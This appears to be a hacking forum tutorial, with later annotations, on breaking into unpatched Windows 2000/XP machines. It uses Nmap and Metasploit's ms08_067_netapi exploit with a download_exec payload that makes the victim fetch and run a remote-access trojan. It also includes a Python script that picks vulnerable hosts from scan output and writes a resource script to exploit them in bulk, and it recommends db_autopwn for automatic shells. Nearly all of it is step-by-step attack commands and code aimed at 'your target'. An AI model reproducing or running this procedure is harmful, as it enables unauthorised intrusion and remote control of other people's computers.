Requirements:
Nmap
Metasploit
First of all you need the IP address of your target.
Then open the Metasploit console & type db_create.
[Use: This'll create or connect you to the database. db_create only exists in the old Metasploit 3.x releases; current releases set the database up with msfdb init outside the console, and you check the connection with db_status.]
Once you do that, type nmap.
[Use: msfconsole passes commands it doesn't know to the system shell, so this runs the Nmap binary and confirms it is installed. db_nmap calls that same binary and stores the results in the database.]
Next you need to type db_nmap -sT -sV followed by the target IP.
[-sT is a TCP connect scan and -sV probes the open ports for service versions. Real OS fingerprinting needs -O; without it you only learn the OS from service banners, but an SMB banner such as "Microsoft Windows XP microsoft-ds" is usually enough here.]
Wait for the scan to finish; a few minutes is typical for a single host with version detection.
Once done, note down the OS, ports, and services running on the target's computer.
Now it's time to exploit the target's machine.
Which exploit you use depends on the OS, ports, and services running on the target's computer.
So, you're lucky if you get Windows XP or 2000 that is missing the MS08-067 patch, because they're easy to exploit.
A firewall only matters if it blocks SMB: the exploit goes in over TCP 445 (or 139), so if your scan shows those ports as filtered rather than open, it cannot work whatever the OS is.
Now I'll tell you about exploiting:-
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
[Use: These are the versions windows/smb/ms08_067_netapi covers; it only works where the October 2008 patch for MS08-067 was never installed.]
Type show exploits
[Use: This'll list all the exploit modules Metasploit has loaded.]
Next you need to type use windows/smb/ms08_067_netapi
[Use: This'll select the exploit windows/smb/ms08_067_netapi]
Now type show targets
[Use: This'll show all the targets the exploit supports]
Now type set target 0
[Use: This'll set the target to entry 0, which for this module is Automatic Targeting; the module fingerprints the OS and service pack itself, so you only pick a specific target if that fails.]
Then type show payloads
[Use: This'll bring up all the payloads compatible with the selected exploit]
Next type set payload windows/download_exec
[Use: This'll set the payload to windows/download_exec]
Then type show options
[Use: This'll show all options of the exploit & payload]
In the window you'll see many options, of which you only need to fill in two: RHOST & URL.
Type set RHOST xxx.xxx.xxx.xxx
[Use: This'll set RHOST (the target's IP) to xxx.xxx.xxx.xxx. Newer Metasploit releases call this option RHOSTS but still accept RHOST.]
Next type set URL [content suppressed]
[Use: This'll set URL to the direct download link of the executable you want the target to fetch. The payload downloads that file and runs it, so the web server hosting it must be reachable from the target.]
At last you need to type exploit
[Use: This'll launch the exploit; if it succeeds, the target downloads and runs the executable at URL.]
If that executable is your RAT server, it connects back and you can now control your target with the RAT.
So any unpatched version of Windows 2000 or XP can be exploited easily this way.
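As an added example (this is not code from the original post), here is a Python script that does the "note down the OS, ports and services, then pick the hosts to exploit" part of the procedure above from a scan saved with Nmap's -oG (grepable) output, and writes the msfconsole commands above out as a Metasploit resource script. The scan output embedded in it is constructed for the example, the host addresses and the download URL are placeholders, and a host is only flagged when 445/tcp is open (not filtered) and the service banner names Windows 2000 or XP. That only says the OS is in the affected range; it does not prove the MS08-067 patch is missing, so check with nmap -p445 --script smb-vuln-ms08-067 before exploiting.

```python
import re

# Constructed sample of Nmap grepable (-oG) output for this example. Real
# output comes from e.g.: db_nmap -sT -sV -oG scan.gnmap <target range>
SAMPLE_GNMAP = """\
# Nmap 5.00 scan initiated Sun Jan  1 12:00:00 2012 as: nmap -sT -sV -oG - 192.168.1.0/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tIgnored State: closed (997)
Host: 192.168.1.11 ()\tPorts: 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (999)
Host: 192.168.1.12 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 445/open/tcp//netbios-ssn//Samba smbd 3.X/\tIgnored State: closed (998)
Host: 192.168.1.13 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows 2000 microsoft-ds/\tIgnored State: closed (999)
# Nmap done at Sun Jan  1 12:05:00 2012 -- 256 IP addresses (4 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)")
# Only Windows 2000 and XP banners are of interest for this tutorial's exploit;
# a Samba banner on 445 is not a Windows host at all.
WIN_RE = re.compile(r"Windows (?:2000|XP)\b")


def parse_gnmap(text):
    """Return {ip: [port record, ...]} from Nmap grepable output.

    Each entry in a Ports: field is port/state/proto/owner/service/rpcinfo/version/.
    Nmap rewrites any '/' inside a version banner as '|', so splitting on '/' is safe.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment and summary lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        records = hosts.setdefault(m.group(1), [])  # Status-only lines still register the host
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 7:
                    continue
                records.append({
                    "port": int(parts[0]),
                    "state": parts[1],
                    "proto": parts[2],
                    "service": parts[4],
                    "version": parts[6],
                })
    return hosts


def ms08_067_candidates(hosts):
    """Hosts worth pointing ms08_067_netapi at: TCP 445 open (not filtered,
    so SMB is reachable through any firewall) and a banner naming Windows
    2000 or XP. Returns [(ip, banner), ...] in scan order."""
    found = []
    for ip, records in hosts.items():
        for r in records:
            if (r["port"] == 445 and r["proto"] == "tcp" and r["state"] == "open"
                    and WIN_RE.search(r["version"])):
                found.append((ip, r["version"]))
                break
    return found


def resource_script(candidates, url):
    """Build a msfconsole resource script that repeats the tutorial's
    exploit/payload setup once per candidate host. 'url' is the download
    link for the executable the download_exec payload fetches (placeholder)."""
    lines = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set TARGET 0",  # Automatic Targeting
        "set PAYLOAD windows/download_exec",
        "set URL " + url,
    ]
    for ip, banner in candidates:
        lines.append("# " + banner)
        lines.append("set RHOST " + ip)
        lines.append("exploit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    # Hypothetical URL; replace with your own server link.
    print(resource_script(ms08_067_candidates(hosts), "http://example.invalid/agent.exe"), end="")
```

Redirect the output to a file and run it with msfconsole -r that-file.rc; the script flags only 192.168.1.10 and 192.168.1.13 from the sample, skipping the host whose 445 is filtered and the Samba host.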
In case you didn't get either of these two OSs, immediately after the Nmap scan
you can use the command db_autopwn -p -t -e.
[Use: -p picks exploit modules by the open ports stored in the database, -t lists the matching modules, -e launches them. In most cases you get a shell. db_autopwn was removed from Metasploit in 2011, so on current releases you have to pick exploits by hand from the scan results.]
Good Luck!